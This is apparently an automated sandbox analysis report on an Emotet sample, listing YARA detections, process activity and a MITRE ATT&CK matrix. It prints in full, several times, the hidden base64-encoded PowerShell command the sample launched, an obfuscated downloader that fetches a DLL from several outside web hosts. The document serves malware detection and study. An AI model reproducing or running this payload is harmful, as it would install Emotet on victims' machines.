IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC	Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000010.00000002.2195836054.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2118741033.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2205409223.0000000000130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2173526087.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2186412601.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2108873547.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2097454036.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2163054350.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2163067625.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2118727946.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2178762795.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2336521474.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2154976635.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2108849548.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2152593179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2152580168.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2338110050.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2173536916.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2129792071.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2129775635.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2188065984.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2121402086.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2336299339.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2130727723.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2144677498.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2145636371.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2205471749.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2144648920.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2198917557.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2186005336.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2163840941.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2195824360.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2097343885.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2206163057.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2110270893.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 12.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.100000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection111	Masquerading21	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter211	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting32	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution3	Logon Script (Mac)	Logon Script (Mac)	Process Injection111	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell3	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information3	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
